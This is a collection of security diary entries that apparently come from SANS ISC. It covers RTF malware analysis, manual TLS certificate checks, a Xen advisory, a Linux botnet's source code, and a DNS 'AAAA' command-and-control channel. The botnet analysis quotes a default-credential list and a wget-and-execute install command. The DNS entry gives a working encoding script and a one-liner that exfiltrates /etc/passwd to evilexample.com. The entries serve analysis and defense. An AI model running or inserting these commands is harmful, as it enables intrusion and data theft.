Diaries

Published: 2016-07-31

Sharing (intel) is caring... or not?

I think almost every one of us working in the IR/Threat Intel area has faced this question at least once: shall we share intel information?

Although I have my own opinion on this, I will try to state some of the most common arguments I have heard over the years, for and against sharing publicly, as objectively as possible so as not to influence the reader.

Why not share publicly?

  • Many organizations do not share because they do not want to reveal that they (may) have been attacked or breached. In this regard, there are closed trusted groups of organizations within the same sector (e.g. ISAC communities), where the willingness to share in such closed environments increases.
  • Trust is an extremely important factor within the intelligence community, and establishing trust is impossible when sharing publicly. Moreover, by not knowing with whom they are sharing, people are inclined to share less or not to share at all.
  • Part of the community suggests that we should “stop providing our adversaries with free audits”[1], since on many occasions a clear change in TTPs has been observed after analysis results were published on blogs or in reports.

 

Why share publicly?

  • Relegating everything to sub-communities may bring the problem of missing the big picture, since this tends to create silos in the long term, and organizations relying entirely on them may miss the opportunity to correlate information shared by organizations belonging to other sectors.
  • Many small organizations may not always be able to afford access to premium intelligence services, nor to join any of these closed sub-communities, for several reasons.
  • Part of the community believes that we should share publicly because the bad guys just don’t care, as is also shown by the fact that they often reuse the same infrastructure and modus operandi.
  • By sharing only within closed groups, those most affected would be DFIR people, who use such public information as a source of intel to understand whether they have been compromised or not.


What is your view on this?

Pasquale

[1] – “When Threat Intel met DFIR”, http://archive.hack.lu/2015/When%20threat%20intel%20met%20DFIR.pdf

3 Comments

Published: 2016-07-30

rtfobj

Yesterday I mentioned rtfobj.

Philippe told me that version 0.48 will parse the sample I analyzed yesterday. 0.48 is not a stable version (0.47 is), but you can download it from GitHub.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

0 Comments

Published: 2016-07-29

Malicious RTF Files

About a year ago I received RTF samples that I could not analyze with RTFScan or rtfobj (FYI: Philippe Lagadec has improved rtfobj.py significantly since then). So I started to write my own RTF analysis tool (rtfdump), but I was not satisfied enough with the way it presented analysis results to warrant a release. Last week, I started analyzing new samples and updated my tool. I released it, and in this diary entry I show how I analyze sample 07884483f95ae891845caf0d50ce507f.


This sample is a heavily obfuscated RTF file. RTF files are essentially sets of nested strings that start with { and end with }. Like this (strongly simplified):

{\rtf {data {more data}}}.

Malicious RTF files contain a payload. Objects in RTF files are embedded in hexadecimal, like this (strongly simplified):
{\rtf {data
{\*\objdata
01050000
02000000
08000000
46696C656E616D6500000000000000...
}}}

Malicious RTF files obfuscate the hexadecimal data in many ways, one of them is to put extra control strings inside the hexadecimal data, like this:
{\rtf {data
{\*\objdata
01050000
02000000
08000000
46696C656E61{\obj}6D6500000000000000...
}}}
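One way to see through this kind of obfuscation is to drop the inserted control-word groups and then keep only the hexadecimal digits. A minimal Python sketch of the idea (not rtfdump itself, and far too naive for heavily nested real-world samples):

```python
import re

def extract_objdata(rtf_fragment):
    # Remove inserted control-word groups such as {\obj} first; a plain
    # "keep hex digits" filter would wrongly keep the 'b' in '\obj'.
    cleaned = re.sub(r"\{\\[^{}]*\}", "", rtf_fragment)
    hexdigits = re.sub(r"[^0-9a-fA-F]", "", cleaned)
    if len(hexdigits) % 2:          # drop a trailing unpaired digit
        hexdigits = hexdigits[:-1]
    return bytes.fromhex(hexdigits)

sample = r"46696C656E61{\obj}6D6500000000000000"
print(extract_objdata(sample))      # b'Filename\x00\x00\x00\x00\x00\x00\x00'
```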

The sample I analyzed takes this to the extreme. After each hexadecimal digit, extra control strings and whitespace are inserted:


(I removed a lot of whitespace to be able to put several hexadecimal digits on the screen).
The hexadecimal digits (highlighted in red) are 01050…

My tool outputs a line of analysis data for each nested string. In this sample, because of the obfuscation, there are a lot of them (22956, which is gigantic for an RTF file).

But you can reduce the output by filtering for entries that (potentially) contain an embedded object using option -f O:

Entry 165 is the one we will take a closer look at first. The information presented for entry 165 is the following: the nesting level is 4, it has 1 child (c=), starts at position 2ae5 in the file (p=), is 1194952 bytes long (l=), has 11429 hexadecimal digits (h=), has no \bin entries (b=), contains an embedded object (O), has 1 unknown character (u=) and is named \*\objdata133765.

We can select entry 165 for closer analysis:

I highlighted the hexadecimal digits in red.

To decode the hexadecimal data, we use option -H:

You can see the hex data clearly now: 01 05 00 ...

Since this is an embedded object, we use option -i to get more info on the object:

From the magic header, we see that the embedded object is an OLE file (FYI: if we analyze it with oledump, we get parsing errors).

Looking further into the data (-H), we see stream entries in the output:

And a bit further, we even find a URL:

Taking a closer look, I see not only a URL, but also hex data that looks like shellcode.

We can select this shellcode by cutting it out of the stream (option -c):

And of course also dump it to a file (option -d), so that we can analyze it with the shellcode analyzer from libemu:

So this RTF file is a downloader.

The presence of shellcode in an RTF file is often an indication of an exploit. rtfdump supports YARA (like many of my *dump tools):

The first YARA search doesn't find anything. But the second search with option -H (to decode the hexadecimal content to binary) has hits for my RTF_ListView2_CLSID YARA rule. This indicates that entry 165 contains a byte sequence for the ListView2 classid, so this is very likely an exploit for vulnerability CVE-2012-0158 in this ListView.

The set of samples I looked at last week are characterized by the following properties:

they start with {\rtfMETAX

they end with this:

If you have interesting tools or techniques to analyze RTF files, please post a comment.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

5 Comments

Published: 2016-07-28

Verifying SSL/TLS certificates manually

I think we can safely say that, with all its deficiencies, SSL/TLS is still a protocol we cannot live without, and the basis of today’s secure communication on the Internet. Quite often I get asked how certificates are really verified by browsers or other client utilities. Sure, the canned answer that “certificates get signed by CAs and a browser verifies if signatures are correct” is always there, but more persistent questions on how it exactly works come up here and there as well.

So, if you ever wondered on how a certificate could be fully manually verified by checking all the steps, this is a diary for you! In this example we will manually verify the certificate of the site you are reading this diary on, https://isc.sans.edu. We will use the openssl utility so you can replicate all the steps for any certificate on any machine where you have openssl. Here we go.

In order to get the certificate we want to verify we can simply connect to https://isc.sans.edu with the openssl utility. For that, the s_client command will be handy and it will print out the certificate in PEM format on the screen so we just have to catch it and put it into a file:

$ openssl s_client -connect isc.sans.edu:443 < /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > isc.sans.edu.pem

The isc.sans.edu.pem file now contains the certificate from isc.sans.edu. We could try to verify it with openssl directly as shown below:

$ openssl verify -verbose isc.sans.edu.pem
isc.sans.edu.pem: C = US, postalCode = 20814, ST = Maryland, L = Bethesda, street = Suite 205, street = 8120 Woodmont Ave, O = The SANS Institute, OU = Network Operations Center (NOC), OU = Unified Communications, CN = isc.sans.edu
error 20 at 0 depth lookup:unable to get local issuer certificate

Hmm, no luck. But that is because the CA file that comes with Linux by default is missing some of the intermediates. Those either have to be in the CA store, or the server has to deliver the whole chain to us when we initially connect. Ok, not a problem – let’s continue manually.
First, let’s see who the issuer really is, and what the certificate’s parameters are:

$ openssl x509 -in isc.sans.edu.pem -noout -text
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            24:21:68:a7:55:13:74:1a:d1:95:fb:62:26:90:c9:1d
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA
        Validity
            Not Before: Apr  7 00:00:00 2015 GMT
            Not After : Apr  6 23:59:59 2018 GMT
        Subject: C=US/postalCode=20814, ST=Maryland, L=Bethesda/street=Suite 205/street=8120 Woodmont Ave, O=The SANS Institute, OU=Network Operations Center (NOC), OU=Unified Communications, CN=isc.sans.edu

Ok, so the certificate is valid, and it is signed by Comodo, as you can see in the highlighted line. The part that matters to the browsers is actually only the CN component. In the Subject field we can see that the CN matches our site (isc.sans.edu) and in the Issuer field we can see that the signing CA (which is an intermediate CA) is called COMODO RSA Organization Validation Secure Server CA.

We can verify this information in the RFC2253 format as well, for both the subject and issuer; this will be easier to read:

$ openssl x509 -in isc.sans.edu.pem -noout -subject -issuer -nameopt RFC2253
subject= CN=isc.sans.edu,OU=Unified Communications,OU=Network Operations Center (NOC),O=The SANS Institute,street=8120 Woodmont Ave,street=Suite 205,L=Bethesda,ST=Maryland,postalCode=20814,C=US
issuer= CN=COMODO RSA Organization Validation Secure Server CA,O=COMODO CA Limited,L=Salford,ST=Greater Manchester,C=GB

So, let’s first try getting the CAcert file that is used by Mozilla. This might help us verify everything. That being said, getting the CAcert file from Mozilla is not all that trivial and some extractions/conversions should be done. Luckily, the good folks at curl already publish the cacert file in PEM format, so we can get it from their web site; it’s available at https://curl.haxx.se/docs/caextract.html

$ curl https://curl.haxx.se/ca/cacert.pem -o cacert.pem

The file even contains the names of the CAs in plain text. Let’s search for Comodo:

$ grep -i Comodo cacert.pem
Comodo AAA Services root
Comodo Secure Services root
Comodo Trusted Services root
COMODO Certification Authority
COMODO ECC Certification Authority
COMODO RSA Certification Authority

It doesn’t have the one that we need: remember that it must match the CN field precisely! This also confirms that it is an intermediate CA. We will probably have to find the intermediate CA’s certificate on Comodo’s web site. Let’s paste the name into Google (“COMODO RSA Organization Validation Secure Server CA“) and see what we get.

The first hit will lead us to https://support.comodo.com/index.php?/Default/Knowledgebase/Article/View/968/108/intermediate-ca-2-comodo-rsa-organization-validation-secure-server-ca-sha-2 and sure enough - this is where our intermediate CA is. Let’s download it:

$ curl 'https://support.comodo.com/index.php?/Knowledgebase/Article/GetAttachment/968/821025' > comodo.crt

Now let’s check the issuer and subject here as well:

$ openssl x509 -in comodo.crt -subject -issuer -noout -nameopt RFC2253
subject= CN=COMODO RSA Organization Validation Secure Server CA,O=COMODO CA Limited,L=Salford,ST=Greater Manchester,C=GB
issuer= CN=COMODO RSA Certification Authority,O=COMODO CA Limited,L=Salford,ST=Greater Manchester,C=GB

Great! That’s exactly what we need – see that the Subject field (the CN component) matches exactly to the signer of our certificate. We are lucky even with the issuer:

$ grep "COMODO RSA Certification Authority" cacert.pem
COMODO RSA Certification Authority

It is a root CA that exists in Mozilla’s cacert.pem – so we have the full chain!
Let’s get back to verifying our certificate from isc.sans.edu. First we need to check which signature algorithm has been used:

$ openssl x509 -in isc.sans.edu.pem -noout -text | grep Signature
    Signature Algorithm: sha256WithRSAEncryption

Ok, SHA256 with RSA (great job Johannes on renewing the cert properly :)). What does this mean? It means that the critical parts of the certificate have been hashed by the CA with the SHA256 hashing algorithm and then encrypted with the CA’s private key. Its public key is available in the comodo.crt file we just downloaded (and isc.sans.edu’s public key is in the certificate we got from the web site). Openssl can confirm that for us as well:

$ openssl x509 -in isc.sans.edu.pem -noout -text

        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (4096 bit)
                Modulus:
                    00:d4:8f:58:63:f4:30:0b:ad:05:d0:37:f1:69:97:
                    6e:27:90:a5:dd:43:d7:c5:30:0d:dc:73:80:6a:fc:

What we need to do now is the following:

  • We need to extract the signature from the certificate and then use Comodo’s public key to decrypt it; with this we will get the SHA256 hash of the certificate
  • Then we need to calculate our own SHA256 hash of the certificate
  • If those two match: the certificate is signed properly
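At its core, the decrypt-and-compare in the list above is just RSA modular exponentiation. A toy Python sketch with textbook-sized numbers (nothing like the real-world 2048/4096-bit keys) shows the idea:

```python
import hashlib

# Toy RSA keypair -- textbook primes, for illustration only.
p, q = 61, 53
n = p * q                            # public modulus (3233)
e = 17                               # public exponent
d = pow(e, -1, (p - 1) * (q - 1))    # private exponent (Python 3.8+)

tbs = b"pretend this is the DER-encoded tbsCertificate"
h = hashlib.sha256(tbs).digest()[0]  # truncated to one byte: our n is tiny

signature = pow(h, d, n)             # what the CA does with its private key
recovered = pow(signature, e, n)     # what the verifier does with the public key

assert recovered == h                # hashes match: the signature checks out
```

In the real protocol the decrypted value is a full PKCS#1-padded DigestInfo structure rather than a bare hash, which is what openssl’s rsautl output further down shows.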

In order to extract components of a certificate we need to decode it to ASN.1 format. Luckily, openssl can do that for us, so let’s see what we get on isc.sans.edu’s certificate:

$ openssl asn1parse -in isc.sans.edu.pem

1582:d=1  hl=2 l=  13 cons: SEQUENCE
 1584:d=2  hl=2 l=   9 prim: OBJECT            :sha256WithRSAEncryption
 1595:d=2  hl=2 l=   0 prim: NULL
 1597:d=1  hl=4 l= 257 prim: BIT STRING

So, the last object is actually the signature – it starts at offset 1597, so let’s extract it with openssl:

$ openssl asn1parse -in isc.sans.edu.pem -out isc.sans.edu.sig -noout -strparse 1597

Now we have the file isc.sans.edu.sig, which is the RSA-encrypted SHA256 hash of the certificate. How do we decrypt it? We need Comodo’s public key, which is available in its certificate, so let’s extract it:

$ openssl x509 -in comodo.crt -pubkey -noout > comodo.pub

Now that we have Comodo’s public key, we can finally decrypt the SHA256 hash. It will work only if the original was encrypted with the corresponding private key. We’ll get an ASN.1 structure back, so let’s display it properly on the screen as well:

$ openssl rsautl -verify -pubin -inkey comodo.pub -in isc.sans.edu.sig -asn1parse
    0:d=0  hl=2 l=  49 cons: SEQUENCE
    2:d=1  hl=2 l=  13 cons:  SEQUENCE
    4:d=2  hl=2 l=   9 prim:   OBJECT            :sha256
   15:d=2  hl=2 l=   0 prim:   NULL
   17:d=1  hl=2 l=  32 prim:  OCTET STRING
      0000 - 4b ca b8 23 4d 52 da e1-31 f1 0d b0 ba 3d 33 6b   K..#MR..1....=3k
      0010 - 0e 3d 68 0f 99 cb 35 43-69 ff 70 d0 1d a6 ef c1   .=h...5Ci.p.....

Yay, it worked. So it has been encrypted properly. The highlighted part is actually the SHA256 hash.
The last step now is to extract the critical parts of the certificate and verify if both hashes match. So what are the critical parts of the certificate? The X509 standard defines it as a so called TBSCertificate (To Be Signed Certificate), and it is the first object in the certificate:

$ openssl asn1parse -in isc.sans.edu.pem 
    0:d=0  hl=4 l=1854 cons: SEQUENCE
    4:d=1  hl=4 l=1574 cons: SEQUENCE
    8:d=2  hl=2 l=   3 cons: cont [ 0 ]
   10:d=3  hl=2 l=   1 prim: INTEGER           :02
   13:d=2  hl=2 l=  16 prim: INTEGER           :242168A75513741AD195FB622690C91D
   31:d=2  hl=2 l=  13 cons: SEQUENCE
   33:d=3  hl=2 l=   9 prim: OBJECT            :sha256WithRSAEncryption

Ok, the first object starts at offset 4, let’s extract it the same way as before:

$ openssl asn1parse -in isc.sans.edu.pem -out tbsCertificate -strparse 4

The file tbsCertificate contains what we need to run the SHA256 hash over. We can again use openssl for that:

$ openssl dgst -sha256 -hex tbsCertificate
SHA256(tbsCertificate)= 4bcab8234d52dae131f10db0ba3d336b0e3d680f99cb354369ff70d01da6efc1

Remember the decrypted ASN.1 object? Scroll up – or let me paste it here one more time (this diary is already longer than I thought really):


   17:d=1  hl=2 l=  32 prim:  OCTET STRING
      0000 - 4b ca b8 23 4d 52 da e1-31 f1 0d b0 ba 3d 33 6b   K..#MR..1....=3k
      0010 - 0e 3d 68 0f 99 cb 35 43-69 ff 70 d0 1d a6 ef c1   .=h...5Ci.p.....

Yay! It’s a full, 100% match. So the certificate is correctly signed by Comodo’s intermediate. We could now repeat all the steps to verify if the intermediate CA is correctly signed by the root CA that we got from Mozilla’s cacert.pem, but we can also have openssl do that for us; we just need to tell it which CA file to use:

$ cat comodo.crt >> cacert.pem
$ openssl verify -verbose -CAfile cacert.pem isc.sans.edu.pem
isc.sans.edu.pem: OK

And that gets us to the end of the verification.

-- Bojan
https://twitter.com/bojanz
INFIGO IS

3 Comments

Published: 2016-07-27

Critical Xen PV guests vulnerabilities

Xen released a patch to fix a critical vulnerability affecting x86 PV[1] guests. A malicious administrator on a vulnerable guest could escalate his privileges to those of the host. All versions of Xen are reported vulnerable, but only on x86 hardware. A mitigation is to run only HVM[2] guests, but patch as soon as possible. The security advisory is available here (CVE-2016-6258).

A second advisory has been released which affects 32-bit PV guests and may cause a crash of the hypervisor, resulting in a denial of service for other guests. The security advisory is available here (CVE-2016-6259).

[1] Paravirtualization is an efficient and lightweight virtualization technique introduced by Xen and later adopted by other virtualization solutions. Paravirtualization doesn't require virtualization extensions from the host CPU. However, paravirtualized guests require a special kernel that is ported to run natively on Xen, so the guests are aware of the hypervisor and can run efficiently without emulation or virtual emulated hardware. Xen PV guest kernels exist for Linux, NetBSD, FreeBSD, OpenSolaris and Novell Netware operating systems.

[2] Hardware Virtual Machine (full virtualization)

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

0 Comments

Published: 2016-07-27

Analysis of a Linux botnet client's source code

I like to play active-defense. Every day, I extract attacker's IP addresses from my SSH honeypots and perform a quick Nmap scan against them. The goal is to gain more knowledge about the compromised hosts. Most of the time, hosts are located behind a residential broadband connection. But sometimes, you find more interesting stuff. When valid credentials are found, the classic scenario is the installation of a botnet client that will be controlled via IRC to launch multiple attacks or scans. Malicious binaries are pre-compiled for many architectures but, this time, I felt lucky and got access to the source code! I found a compromised host (located in the Seychelles) that was hosting pre-compiled binaries and the source code of the botnet client itself. I had a quick look of course...

Honestly, the client is not very complex and only basic features are implemented but it helps to understand how to code malicious software. First of all, only one C&C server was hardcoded in the source code (also located in the Seychelles) but the client can handle multiple servers. I presume that binaries are compiled with a new C&C every time a new campaign is started. The connection occurred on an unusual port: 9271 (the default one being 6667 - IRC).

Once started, the client forks itself and tries to connect to its C&C. If that does not work, it sleeps for five seconds and tries the next one (if configured).

if (pid1 = fork()) {
    waitpid(pid1, &status, 0);
    exit(0);
} else if (!pid1) {
    if (pid2 = fork()) {
        exit(0);
    } else if (!pid2) {
    } else {
    }
} else {
}

setsid();
signal(SIGPIPE, SIG_IGN);

while(1)
{
    if(initConnection()) { sleep(5); continue; }
    ....
}

Once successfully connected, it enters the main loop waiting for commands. The following ones were implemented:

  • PING (expecting a classic “PONG” reply)
  • GETLOCALIP (returns the local IP address of the bot)
  • SCANNER [ON|OFF] (starts or stops the Telnet scanner - see below)
  • EMAIL (sends an e-mail - see below)
  • HOLD (holds a TCP connection to a given ip:port)
  • JUNK (floods a TCP connection with random data - see below)
  • UDP (UDP flood against a target)
  • TCP (TCP flood against a target)

The "SCANNER" command looks like the most interesting one; it implements a basic Telnet scanner. It generates random public IP addresses with the following function:

in_addr_t getRandomPublicIP()
{
    if(ipState[1] < 255 && ipState[2] < 255 && ipState[3] < 255 && ipState[4] < 255)
        {
            ipState[1]++;
            ipState[2]++;
            ipState[3]++;
            ipState[4]++;
            char ip[16];
            szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]);
            return inet_addr(ip);
        }

    ipState[1] = 0;
    ipState[2] = 0;
    ipState[3] = 0;
    ipState[4] = 0;
    while(
            (ipState[1] == 0) ||
            (ipState[1] == 10) ||
            (ipState[1] == 100 && (ipState[2] >= 64 && ipState[2] <= 127)) ||
            (ipState[1] == 127) ||
            (ipState[1] == 169 && ipState[2] == 254) ||
            (ipState[1] == 172 && (ipState[2] <= 16 && ipState[2] <= 31)) ||
            (ipState[1] == 192 && ipState[2] == 0 && ipState[3] == 2) ||
            (ipState[1] == 192 && ipState[2] == 88 && ipState[3] == 99) ||
            (ipState[1] == 192 && ipState[2] == 168) ||
            (ipState[1] == 198 && (ipState[2] == 18 || ipState[2] == 19)) ||
            (ipState[1] == 198 && ipState[2] == 51 && ipState[3] == 100) ||
            (ipState[1] == 203 && ipState[2] == 0 && ipState[3] == 113) ||
            (ipState[1] >= 224)
        )
        {
            ipState[1] = rand() % 255;
            ipState[2] = rand() % 255;
            ipState[3] = rand() % 255;
            ipState[4] = rand() % 255;
        }

    char ip[16];
        szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]);
    return inet_addr(ip);
}
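The exclusion logic above is easier to read when re-expressed with Python's ipaddress module (an illustrative re-implementation, not the bot's code):

```python
import ipaddress
import random

# Reserved/special-purpose ranges mirrored from the C checks above.
RESERVED = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.0.2.0/24", "192.88.99.0/24",
    "192.168.0.0/16", "198.18.0.0/15", "198.51.100.0/24",
    "203.0.113.0/24", "224.0.0.0/3",
)]

def random_public_ip():
    # Keep drawing random 32-bit addresses until one falls outside
    # every reserved range.
    while True:
        ip = ipaddress.IPv4Address(random.getrandbits(32))
        if not any(ip in net for net in RESERVED):
            return ip
```

Note, by the way, that the C code's check for the 172 range compares `ipState[2] <= 16 && ipState[2] <= 31`, which looks like a typo for the 172.16.0.0/12 range it presumably intended to exclude.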

Then, it tries to connect to port 23 and to authenticate using a list of hardcoded credentials:

char *usernames[] = {"root\0", "\0", "admin\0", "user\0", "login\0", "guest\0", "user\0","pi\0","support\0"};
char *passwords[] = {"root\0", "\0", "toor\0", "admin\0", "user\0", "guest\0", "login\0", "changeme\0", "1234\0", "12345\0", "123456\0", "default\0", "pass\0", "password\0","alpine\0","raspberry\0","support\0", "ubnt\0"};

If the connection is successful, it tries to download and install itself. On the same server, multiple precompiled binaries are available for multiple architectures (i386, x64, arm, mips, ...).

if(send(fds[i].fd, "cd /tmp; wget http://x.x.x.x/bins.sh;chmod 777 bins.sh;sh bins.sh;busybox tftp -r tftp2.sh -g x.x.x.x;chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *\r\n", 157, MSG_NOSIGNAL) < 0)
{
    sclose(fds[i].fd); 
    fds[i].state = 0;
    fds[i].complete = 1;
    continue;
}

The email feature looked experimental because some part of the code was commented out and the "From" field was also hardcoded:

if(send(fd, "HELO rastrent.com\r\n", 19, MSG_NOSIGNAL) != 19) { close(fd); return; }
if(fdgets(buffer, 1024, fd) == NULL) { close(fd); return; }
if(strstr(buffer, "250 ") == NULL) { close(fd); return; }
memset(buffer, 0, 1024);

if(send(fd, "MAIL FROM: \r\n", 33, MSG_NOSIGNAL) != 33) { close(fd); return; }
if(fdgets(buffer, 1024, fd) == NULL) { close(fd); return; }
if(strstr(buffer, "250 ") == NULL) { close(fd); return; }
memset(buffer, 0, 1024);

The domain rastrent.com is registered but not used at the moment. Here are the passive DNS records found:

2015-11-06 184.154.229.207
2015-02-24 69.64.147.242
2014-10-14 208.43.167.119

As for the flood commands, the "UDP" and "TCP" ones are classic. The "JUNK" command just sends random data (in blocks of 1KB) into a TCP connection:

//nonblocking sweg
makeRandomStr(watwat, 1024);
if(send(fds[i].fd, watwat, 1024, MSG_NOSIGNAL) == -1 && errno != EAGAIN)
{
     close(fds[i].fd);
     fds[i].state = 0;
}

This is not a very complex example, but it shows how a badly protected Linux box can be infected and integrated into a botnet to generate malicious activity. The fact that the main feature is a Telnet scanner, and the presence of binaries for multiple architectures, suggest that the botnet targets residential routers or small embedded Linux devices such as storage appliances. In the meantime, the server hosting the source code and binaries has been offline for 24 hours. The hardcoded C&C server is still alive.

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

3 Comments

Published: 2016-07-26

Command and Control Channels Using "AAAA" DNS Records

Data exfiltration and command and control channels via DNS are not exactly new. In many ways, DNS is an ideal covert channel. Even well-protected systems usually can connect to a recursive name server that will forward queries to any authoritative name server. The "bucket chain" of DNS servers will bypass whatever firewall is used to protect the system. Intrusion detection systems have implemented signatures for abnormally large queries, but often valid domain names are rather long, in particular if they are associated with public clouds or content delivery networks. DNSSEC records also tend to trigger some of these signatures.

Traditionally, an infected system will exfiltrate data using "A" records, and then request new commands to be executed using "TXT" records. While A records work great to exfiltrate data, "TXT" records are more problematic as they are less commonly used and tend to "stick out" more.

Note that we are not interested in implementing a complete "IP over DNS" tunnel here like dnscat2 or iodine. We try to be stealthy on the network by using as few and as normal DNS queries as possible, and we are trying to be covert on the system by using common command line tools instead of installing additional software that may trigger anti-malware systems.

There are a couple of methods that can be used to return more meaningful data than an IPv4 address in a DNS "A" query response:

  • Additional information: sort of anything goes here, but the recursive DNS server doesn't necessarily pass the information along
  • The response includes a copy of the query. One could modify the query part of the response (after all, we don't expect the response to be used in the traditional sense).

But to do either, we need a custom DNS server. I was trying to find a way to pass data back to the infected system without having to code up a new DNS server (ok, there is Scapy ;-) ... maybe that will be a second diary).

"AAAA" records, on the other hand, return four times as much data as "A" records, and by returning multiple "AAAA" records, we can encode reasonably complex commands. We could do the same with "A" records, but doing so with "AAAA" records turns out to be a lot simpler.

 

First, we need to encode a set of commands in "AAAA" records. To do this, we convert the content of the file we are trying to encode into hex, and then use the dynamic DNS utility "nsupdate" to add the respective records to our zone (I am using "evilexample.com" here):

file2ipv6.sh:

#!/bin/sh
n=2000
echo server localhost
echo zone evilexample.com
echo prereq yxrrset a.evilexample.com AAAA
echo update delete a.evilexample.com
echo send
for b in `xxd -p -c 14 $1 | sed 's/..../&:/g' | sed 's/:$//' `; do
 f=$n:$b
 f=`echo $f | sed 's/:..$/&00/'`
 f=`echo $f:0000:0000:0000:0000:0000:0000:0000:0000 | head -c39`
 echo update a.evilexample.com. 10 AAAA $f
 n=$((n+1));
done
echo send

Let's encode the following string (in "sample.txt"):

for b in `xxd -p /etc/passwd`; do dig +short $b.evilexample.com; done

This command, once executed on the receiving end, will exfiltrate the content of /etc/passwd.
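The chunking that file2ipv6.sh performs can be sketched in Python as well (an illustrative re-implementation of the same layout: a 2-byte serial followed by 14 payload bytes per record):

```python
def encode(data, serial_base=0x2000):
    # Split into 14-byte chunks; prefix each with an incrementing
    # 2-byte serial and zero-pad the last chunk, as file2ipv6.sh does.
    records = []
    for i in range(0, len(data), 14):
        chunk = data[i:i + 14].ljust(14, b"\x00")
        groups = [format(serial_base + len(records), "04x")]
        groups += [chunk[j:j + 2].hex() for j in range(0, 14, 2)]
        records.append(":".join(groups))
    return records

payload = b"for b in `xxd -p /etc/passwd`; do dig +short $b.evilexample.com; done\n"
for record in encode(payload):
    print(record)
```

This prints, in serial order, the same five addresses that the dig query returns further down.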

Next, we use file2ipv6.sh to create the necessary AAAA records. nsupdate will pass the commands to the authoritative name server. The "dns.key" file is the update key for the zone you are using (if you configured one).

./file2ipv6.sh sample.txt | nsupdate -k dns.key 

Once this completes, you should see the following AAAA records:

$ dig +short AAAA a.evilexample.com
2003:7274:2024:622e:6576:696c:6578:616d
2004:706c:652e:636f:6d3b:2064:6f6e:650a
2000:666f:7220:6220:696e:2060:7878:6420
2001:2d70:202f:6574:632f:7061:7373:7764
2002:603b:2064:6f20:6469:6720:2b73:686f

Note how the first two bytes are used as a "serial number" as the order in which the records are returned may change.
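Reassembly on the receiving side is then just a matter of sorting on that serial and concatenating the remaining 14 bytes of each record; in Python (using the records above):

```python
records = [
    "2003:7274:2024:622e:6576:696c:6578:616d",
    "2004:706c:652e:636f:6d3b:2064:6f6e:650a",
    "2000:666f:7220:6220:696e:2060:7878:6420",
    "2001:2d70:202f:6574:632f:7061:7373:7764",
    "2002:603b:2064:6f20:6469:6720:2b73:686f",
]

def decode(records):
    # Sort on the first group (the serial), strip it, and hex-decode
    # the remaining seven groups of each record.
    data = b""
    for rec in sorted(records, key=lambda r: int(r.split(":")[0], 16)):
        data += bytes.fromhex(rec.replace(":", "")[4:])
    return data

print(decode(records).decode(), end="")
# for b in `xxd -p /etc/passwd`; do dig +short $b.evilexample.com; done
```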

On the receiving end (infected system), we can now extract the data with a simple shell script:

dig +short AAAA a.evilexample.com | sort -n  | cut -f2- -d':' | tr -d ':' | xxd -p -c 14 -r

To execute the script above, just enclose it in backticks, add it to a cron job or whatever, and you have a command and control channel over DNS "AAAA" records. Best part: all you need on the infected host is a shell script.

You can find the script above on github: https://github.com/DShield-ISC/IPv6DNSExfil

Why use bash vs. perl/python? Because it works!  

How do we detect these covert channels?

The best method is likely to monitor the volume of DNS queries from particular hosts. Mail servers tend to send a lot of DNS queries, but other, normal servers will only send a few. You could implement rate limiting on the recursive name server to disrupt the covert channel, or just monitor your query logs or traffic logs to detect abnormal volumes of DNS traffic from particular hosts.
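As a starting point, per-host query counting can be a few lines of Python over your resolver's query log (the log lines here are a hypothetical BIND-style example; adapt the regex to your resolver):

```python
import re
from collections import Counter

# Hypothetical BIND-style query-log excerpt.
log = [
    "client 10.0.0.5#4242: query: a.evilexample.com IN AAAA +",
    "client 10.0.0.5#4243: query: a.evilexample.com IN AAAA +",
    "client 10.0.0.9#5353: query: isc.sans.edu IN A +",
]

def noisy_hosts(lines, threshold):
    # Count queries per client IP and flag those at or above the threshold.
    counts = Counter()
    for line in lines:
        match = re.search(r"client ([0-9.]+)#\d+", line)
        if match:
            counts[match.group(1)] += 1
    return [ip for ip, n in counts.most_common() if n >= threshold]

print(noisy_hosts(log, threshold=2))   # ['10.0.0.5']
```

In practice the threshold should come from a per-host baseline over a longer window, not a fixed constant.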

Further Reading:

[1] https://www.sans.edu/student-files/presentations/ftp_nslookup_withnotes.pdf
[2] https://isc.sans.edu/diary/Packet%2BTricks%2Bwith%2Bxxd/10306
[3] https://github.com/iagox86/dnscat2
[4] http://code.kryo.se/iodine/

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

 

0 Comments

Published: 2016-07-25

Python Malware - Part 4

You don't always get a text file with source code when you extract Python code from a PyInstaller-produced EXE.

I produced the following Python code including shellcode, and generated an EXE with PyInstaller:

Then I extract the Python code:

This time, the extracted shellcode file doesn't contain Python source code:

It's actually compiled Python bytecode.

Add the following 8 bytes to the beginning of the file and save it as shellcode.pyc:
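For CPython 2.7 bytecode, those 8 bytes are the magic number 03 F3 0D 0A followed by a 4-byte little-endian timestamp. A sketch of building the header (assuming the sample was compiled with Python 2.7; other versions use a different magic number):

```python
import struct
import time

PY27_MAGIC = b"\x03\xf3\x0d\x0a"    # CPython 2.7's pyc magic number

def pyc_header():
    # 4-byte magic + 4-byte little-endian modification timestamp;
    # decompilers only check the magic, so any timestamp works.
    return PY27_MAGIC + struct.pack("<I", int(time.time()))

# Prepend it to the extracted file:
# open("shellcode.pyc", "wb").write(pyc_header() + open("shellcode", "rb").read())
```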

Now you can use a Python bytecode decompiler like Easy Python Decompiler:

Here is the recovered source code (shellcode.pyc_dis):

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

0 Comments

